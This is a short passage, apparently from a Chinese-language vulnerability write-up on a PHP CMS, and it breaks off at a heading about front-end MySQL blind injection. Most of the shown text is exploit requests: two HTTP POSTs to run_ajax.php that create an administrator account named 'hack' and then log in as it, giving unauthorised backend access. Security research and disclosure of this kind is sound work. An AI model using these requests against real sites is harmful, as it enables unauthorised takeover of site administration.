Payload : POST /cms/cms/admin/run_ajax.php?run=admin HTTP/1.1mima=123456&guanliyuan=hack 然后是登录不上后台的(等级不够),这里再通过Login函数创造Sessions. POST /cms/cms/admin/run_ajax.php?run=login HTTP/1.1guanliyuan=hack&pwd=123456 刷新即可登录后台. 0x06 前台Mysql盲注 注入点1 对代码进行...